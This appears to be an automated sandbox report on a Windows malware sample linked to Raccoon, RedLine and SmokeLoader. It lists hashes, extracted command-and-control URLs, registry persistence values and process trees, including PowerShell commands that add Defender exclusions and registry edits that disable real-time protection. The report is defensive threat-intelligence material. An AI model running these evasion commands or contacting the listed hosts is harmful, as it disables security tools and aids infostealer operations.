raccoon | 6f54181807e2995147e132e7bf87ed669966b4f68a49b29fdaf4467864aa946a

Analysis

max time kernel
150s
max time network
179s
platform
windows7_x64
resource
win7-en-20210920
submitted
22-10-2021 21:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fe2a170c403e99115e30dd615f848a3c.exe
Size

333KB
MD5

fe2a170c403e99115e30dd615f848a3c
SHA1

0170400caa176e1035f153afac061e0364f34e02
SHA256

6f54181807e2995147e132e7bf87ed669966b4f68a49b29fdaf4467864aa946a
SHA512

db70fe04c355bf0206ce835cae88f50c65a84f99bf41b51e0f73aab39ba1662d80de683cc78d1ed17bdbef85a7aadf65f618318a3b55755b2ade42aad44e6486

Score

10^/10

raccoon redline smokeloader 6655b26b014f56ed3e8df973c407aa18e865e396 backdoor discovery evasion infostealer persistence spyware stealer themida trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://gejajoo7.top/

http://sysaheu9.top/

http://nusurtal4f.net/

http://netomishnetojuk.net/

http://escalivrouter.net/

http://nick22doom4.net/

http://wrioshtivsio.su/

http://nusotiso4.su/

http://rickkhtovkka.biz/

http://palisotoliso.net/

rc4.i32

Extracted

Family

raccoon

Botnet

6655b26b014f56ed3e8df973c407aa18e865e396

Attributes

url4cnc
http://telegka.top/kaba4ello
http://telegin.top/kaba4ello
https://t.me/kaba4ello

rc4.plain

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

D629.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\TTeDhhhkw\\YeznrtSKe.exe"	D629.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1732-107-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline
behavioral1/memory/1732-108-0x00000000004370CE-mapping.dmp	family_redline
behavioral1/memory/1732-110-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Nirsoft 14 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\ed607cf8-18fd-418c-9e1a-872538625671\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\ed607cf8-18fd-418c-9e1a-872538625671\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\ed607cf8-18fd-418c-9e1a-872538625671\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\ed607cf8-18fd-418c-9e1a-872538625671\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\ed607cf8-18fd-418c-9e1a-872538625671\AdvancedRun.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\ed607cf8-18fd-418c-9e1a-872538625671\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\ed607cf8-18fd-418c-9e1a-872538625671\AdvancedRun.exe	Nirsoft

Downloads MZ/PE file

Executes dropped EXE 14 IoCs

Processes:

BA79.exeBA79.exeBFF6.exeC795.exeCA35.exeCEA9.exeBFF6.exeD629.exeBFF6.exeAdvancedRun.exeAdvancedRun.exesvchost.exeAdvancedRun.exeAdvancedRun.exe

pid	process
1352	BA79.exe
1816	BA79.exe
744	BFF6.exe
1692	C795.exe
964	CA35.exe
1920	CEA9.exe
1408	BFF6.exe
1980	D629.exe
1732	BFF6.exe
1300	AdvancedRun.exe
948	AdvancedRun.exe
1624	svchost.exe
652	AdvancedRun.exe
1612	AdvancedRun.exe

Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

C795.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	C795.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	C795.exe

Deletes itself 1 IoCs

Processes:

pid process

1272

Loads dropped DLL 12 IoCs

Processes:

BA79.exeBFF6.exeCA35.exeD629.exeAdvancedRun.exesvchost.exeAdvancedRun.exe

pid	process
1352	BA79.exe
744	BFF6.exe
964	CA35.exe
744	BFF6.exe
1980	D629.exe
1980	D629.exe
1300	AdvancedRun.exe
1300	AdvancedRun.exe
1624	svchost.exe
1624	svchost.exe
652	AdvancedRun.exe
652	AdvancedRun.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\C795.exe	themida
behavioral1/memory/1692-82-0x0000000000A40000-0x0000000000A41000-memory.dmp	themida

Windows security modification 2 TTPs 9 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

D629.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\D629.exe = "0"	D629.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	D629.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	D629.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	D629.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	D629.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Cursors\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\svchost.exe = "0"	D629.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection	D629.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	D629.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	D629.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

svchost.exeD629.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\콗콦콳켵콥켶콆콥켳콰콡콣콦콤켴 = "C:\\Windows\\Cursors\\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\콗콦콳켵콥켶콆콥켳콰콡콣콦콤켴 = "C:\\Windows\\Cursors\\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\\svchost.exe"	D629.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

C795.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C795.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

C795.exe

pid process

1692 C795.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	C795.exe

pid	process
1692	C795.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

fe2a170c403e99115e30dd615f848a3c.exeBA79.exeBFF6.exeD629.exesvchost.exe

description	pid	process	target process
PID 1756 set thread context of 692	1756	fe2a170c403e99115e30dd615f848a3c.exe	fe2a170c403e99115e30dd615f848a3c.exe
PID 1352 set thread context of 1816	1352	BA79.exe	BA79.exe
PID 744 set thread context of 1408	744	BFF6.exe	BFF6.exe
PID 744 set thread context of 1732	744	BFF6.exe	BFF6.exe
PID 1980 set thread context of 620	1980	D629.exe	cvtres.exe
PID 1624 set thread context of 2304	1624	svchost.exe	cvtres.exe

Drops file in Windows directory 2 IoCs

Processes:

D629.exe

description	ioc	process
File created	C:\Windows\Cursors\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\svchost.exe	D629.exe
File opened for modification	C:\Windows\Cursors\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\svchost.exe	D629.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

BA79.exeCA35.exefe2a170c403e99115e30dd615f848a3c.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	BA79.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	BA79.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CA35.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fe2a170c403e99115e30dd615f848a3c.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fe2a170c403e99115e30dd615f848a3c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	BA79.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fe2a170c403e99115e30dd615f848a3c.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CA35.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CA35.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe

Modifies registry class 5 IoCs

Processes:

explorer.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

fe2a170c403e99115e30dd615f848a3c.exe

pid	process
692	fe2a170c403e99115e30dd615f848a3c.exe
692	fe2a170c403e99115e30dd615f848a3c.exe
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272
1272

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1272
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

fe2a170c403e99115e30dd615f848a3c.exeBA79.exeCA35.exe

pid process

692 fe2a170c403e99115e30dd615f848a3c.exe
1816 BA79.exe
964 CA35.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

Processes:

D629.exeAdvancedRun.exeAdvancedRun.exepowershell.exepowershell.exepowershell.exeC795.exepowershell.exeexplorer.exesvchost.exeAUDIODG.EXEBFF6.exepowershell.exeAdvancedRun.exepowershell.exepowershell.exeAdvancedRun.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	1272
Token: SeShutdownPrivilege	1272
Token: SeDebugPrivilege	1980	D629.exe
Token: SeShutdownPrivilege	1272
Token: SeDebugPrivilege	1300	AdvancedRun.exe
Token: SeImpersonatePrivilege	1300	AdvancedRun.exe
Token: SeDebugPrivilege	948	AdvancedRun.exe
Token: SeImpersonatePrivilege	948	AdvancedRun.exe
Token: SeDebugPrivilege	952	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	1692	C795.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeShutdownPrivilege	1196	explorer.exe
Token: SeShutdownPrivilege	1196	explorer.exe
Token: SeShutdownPrivilege	1196	explorer.exe
Token: SeShutdownPrivilege	1196	explorer.exe
Token: SeShutdownPrivilege	1196	explorer.exe
Token: SeShutdownPrivilege	1272
Token: SeDebugPrivilege	1624	svchost.exe
Token: 33	1720	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1720	AUDIODG.EXE
Token: 33	1720	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1720	AUDIODG.EXE
Token: SeDebugPrivilege	1732	BFF6.exe
Token: SeDebugPrivilege	900	powershell.exe
Token: SeDebugPrivilege	652	AdvancedRun.exe
Token: SeImpersonatePrivilege	652	AdvancedRun.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeShutdownPrivilege	1196	explorer.exe
Token: SeShutdownPrivilege	1196	explorer.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	1612	AdvancedRun.exe
Token: SeImpersonatePrivilege	1612	AdvancedRun.exe
Token: SeDebugPrivilege	2184	powershell.exe

Suspicious use of FindShellTrayWindow 36 IoCs

Processes:

explorer.exe

pid	process
1272
1272
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1272
1272
1272
1272
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

explorer.exe

pid	process
1272
1272
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1272
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe
1196	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

fe2a170c403e99115e30dd615f848a3c.exeBA79.exeBFF6.exeD629.exe

description	pid	process	target process
PID 1756 wrote to memory of 692	1756	fe2a170c403e99115e30dd615f848a3c.exe	fe2a170c403e99115e30dd615f848a3c.exe
PID 1756 wrote to memory of 692	1756	fe2a170c403e99115e30dd615f848a3c.exe	fe2a170c403e99115e30dd615f848a3c.exe
PID 1756 wrote to memory of 692	1756	fe2a170c403e99115e30dd615f848a3c.exe	fe2a170c403e99115e30dd615f848a3c.exe
PID 1756 wrote to memory of 692	1756	fe2a170c403e99115e30dd615f848a3c.exe	fe2a170c403e99115e30dd615f848a3c.exe
PID 1756 wrote to memory of 692	1756	fe2a170c403e99115e30dd615f848a3c.exe	fe2a170c403e99115e30dd615f848a3c.exe
PID 1756 wrote to memory of 692	1756	fe2a170c403e99115e30dd615f848a3c.exe	fe2a170c403e99115e30dd615f848a3c.exe
PID 1756 wrote to memory of 692	1756	fe2a170c403e99115e30dd615f848a3c.exe	fe2a170c403e99115e30dd615f848a3c.exe
PID 1272 wrote to memory of 1352	1272		BA79.exe
PID 1272 wrote to memory of 1352	1272		BA79.exe
PID 1272 wrote to memory of 1352	1272		BA79.exe
PID 1272 wrote to memory of 1352	1272		BA79.exe
PID 1352 wrote to memory of 1816	1352	BA79.exe	BA79.exe
PID 1352 wrote to memory of 1816	1352	BA79.exe	BA79.exe
PID 1352 wrote to memory of 1816	1352	BA79.exe	BA79.exe
PID 1352 wrote to memory of 1816	1352	BA79.exe	BA79.exe
PID 1352 wrote to memory of 1816	1352	BA79.exe	BA79.exe
PID 1352 wrote to memory of 1816	1352	BA79.exe	BA79.exe
PID 1352 wrote to memory of 1816	1352	BA79.exe	BA79.exe
PID 1272 wrote to memory of 744	1272		BFF6.exe
PID 1272 wrote to memory of 744	1272		BFF6.exe
PID 1272 wrote to memory of 744	1272		BFF6.exe
PID 1272 wrote to memory of 744	1272		BFF6.exe
PID 744 wrote to memory of 1408	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1408	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1408	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1408	744	BFF6.exe	BFF6.exe
PID 1272 wrote to memory of 1692	1272		C795.exe
PID 1272 wrote to memory of 1692	1272		C795.exe
PID 1272 wrote to memory of 1692	1272		C795.exe
PID 1272 wrote to memory of 1692	1272		C795.exe
PID 1272 wrote to memory of 964	1272		CA35.exe
PID 1272 wrote to memory of 964	1272		CA35.exe
PID 1272 wrote to memory of 964	1272		CA35.exe
PID 1272 wrote to memory of 964	1272		CA35.exe
PID 1272 wrote to memory of 1920	1272		CEA9.exe
PID 1272 wrote to memory of 1920	1272		CEA9.exe
PID 1272 wrote to memory of 1920	1272		CEA9.exe
PID 1272 wrote to memory of 1920	1272		CEA9.exe
PID 744 wrote to memory of 1408	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1408	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1408	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1408	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1408	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1732	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1732	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1732	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1732	744	BFF6.exe	BFF6.exe
PID 1272 wrote to memory of 1980	1272		D629.exe
PID 1272 wrote to memory of 1980	1272		D629.exe
PID 1272 wrote to memory of 1980	1272		D629.exe
PID 1272 wrote to memory of 1980	1272		D629.exe
PID 744 wrote to memory of 1732	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1732	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1732	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1732	744	BFF6.exe	BFF6.exe
PID 744 wrote to memory of 1732	744	BFF6.exe	BFF6.exe
PID 1980 wrote to memory of 1700	1980	D629.exe	powershell.exe
PID 1980 wrote to memory of 1700	1980	D629.exe	powershell.exe
PID 1980 wrote to memory of 1700	1980	D629.exe	powershell.exe
PID 1980 wrote to memory of 1700	1980	D629.exe	powershell.exe
PID 1980 wrote to memory of 952	1980	D629.exe	powershell.exe
PID 1980 wrote to memory of 952	1980	D629.exe	powershell.exe
PID 1980 wrote to memory of 952	1980	D629.exe	powershell.exe
PID 1980 wrote to memory of 952	1980	D629.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\fe2a170c403e99115e30dd615f848a3c.exe
"C:\Users\Admin\AppData\Local\Temp\fe2a170c403e99115e30dd615f848a3c.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1756

C:\Users\Admin\AppData\Local\Temp\fe2a170c403e99115e30dd615f848a3c.exe
"C:\Users\Admin\AppData\Local\Temp\fe2a170c403e99115e30dd615f848a3c.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:692

C:\Users\Admin\AppData\Local\Temp\BA79.exe
C:\Users\Admin\AppData\Local\Temp\BA79.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1352

C:\Users\Admin\AppData\Local\Temp\BA79.exe
C:\Users\Admin\AppData\Local\Temp\BA79.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1816

C:\Users\Admin\AppData\Local\Temp\BFF6.exe
C:\Users\Admin\AppData\Local\Temp\BFF6.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:744

C:\Users\Admin\AppData\Local\Temp\BFF6.exe
C:\Users\Admin\AppData\Local\Temp\BFF6.exe
2⤵
- Executes dropped EXE
PID:1408

C:\Users\Admin\AppData\Local\Temp\BFF6.exe
C:\Users\Admin\AppData\Local\Temp\BFF6.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Users\Admin\AppData\Local\Temp\C795.exe
C:\Users\Admin\AppData\Local\Temp\C795.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Users\Admin\AppData\Local\Temp\CA35.exe
C:\Users\Admin\AppData\Local\Temp\CA35.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:964

C:\Users\Admin\AppData\Local\Temp\CEA9.exe
C:\Users\Admin\AppData\Local\Temp\CEA9.exe
1⤵
- Executes dropped EXE
PID:1920

C:\Users\Admin\AppData\Local\Temp\D629.exe
C:\Users\Admin\AppData\Local\Temp\D629.exe
1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\svchost.exe" -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\D629.exe" -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\svchost.exe" -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\35b47823-394c-4fe1-9dbc-eb2bc070e865\AdvancedRun.exe" /SpecialRun 4101d8 1300
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\D629.exe" -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1196

C:\Windows\system32\ctfmon.exe
ctfmon.exe
3⤵
PID:272

C:\Windows\Cursors\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\svchost.exe
"C:\Windows\Cursors\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\svchost.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\svchost.exe" -Force
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\svchost.exe" -Force
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\㑱㑧㑙㑘㑞㒋㒓㒌㒊㒌㑙㑖㒋㑼㑟\svchost.exe" -Force
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Users\Admin\AppData\Local\Temp\ed607cf8-18fd-418c-9e1a-872538625671\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\ed607cf8-18fd-418c-9e1a-872538625671\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ed607cf8-18fd-418c-9e1a-872538625671\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:652

C:\Users\Admin\AppData\Local\Temp\ed607cf8-18fd-418c-9e1a-872538625671\AdvancedRun.exe
